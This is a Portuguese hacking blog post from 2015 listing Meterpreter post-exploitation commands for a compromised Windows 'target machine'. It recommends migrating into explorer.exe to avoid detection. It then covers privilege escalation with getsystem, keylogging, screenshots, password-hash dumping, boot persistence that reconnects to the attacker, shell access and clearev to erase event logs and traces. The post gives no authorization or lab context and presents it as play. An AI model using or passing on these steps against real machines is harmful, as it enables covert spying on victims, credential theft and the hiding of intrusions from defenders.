Olá mais uma vez,
Esse tutorial tem como objetivo mostrar como usar o Metasploit Framework para explorar uma máquina alvo, nesse tutorial partimos do princípio que vc já abriu uma sessão no meterpreter, caso ainda não tenha conseguido pode tentar algumas de nossas dicas como essa aqui: http://yahoohackingbr.blogspot.com.br/2015/04/tutorial-kali-linux-como-criar-um.html
Após abrir a sessão a melhor sugestão é migrarmos para um processo mais estável e que torne mais difícil vc ser detectado para isso precisamos listar todos os processos disponíveis usando o comando ps
Será exibido uma tela semelhante a essa
Aqui podemos visualizar todos os processos em execução, uma sugestão é migrarmos para o processo explorer.exe para isso precisamos localizar esse processo na lista e ver qual o valor do PID daí migramos para ele usando o comando migrate 1708 (troque o número 1708 pelo número do seu PID)
Seguem-se agora algumas opções:
sysinfo – esse comando vai mostrar qual a versão do windows da máquina alvo.
getsystem – Eleva o nível de privilégio para SYSTEM
ipconfig – Mostra o endereço ip da máquina alvo
screenshot – Salva um arquivo JPEG com um print da tela do computador alvo
keyscan_start – Inicia o keylogger ou seja captura tudo que for digitado no teclado do computador alvo
keyscan_dump – Visualiza os dados capturados após o keyscan_start.
keyscan_stop – Para a captura
run persistence -X - Esse comando configura a máquina alvo para que a cada boot no sistema ela estabeleça novamente a conexão com a máquina atacante.
hashdump – faz a captura do hash de senhas do computador alvo.
execute – Executa um aplicativo ex. execute -f calc.exe
shell – Abre um prompt de comando
clearev - Limpa os logs de eventos do Windows, ou seja, apaga possíveis rastros deixados por vc.
Bom essas apenas algumas dicas que já dá pra ir brincando um pouco kk.
Usando o comando help vc também pode descobrir várias outras opções.
Espero que tenham gostado e até a próxima
quarta-feira, 15 de abril de 2015
Tutorial Kali Linux: Comandos Meterpreter
15:26
No comments
Assinar:
Postar comentários (Atom)
0 comentários:
Postar um comentário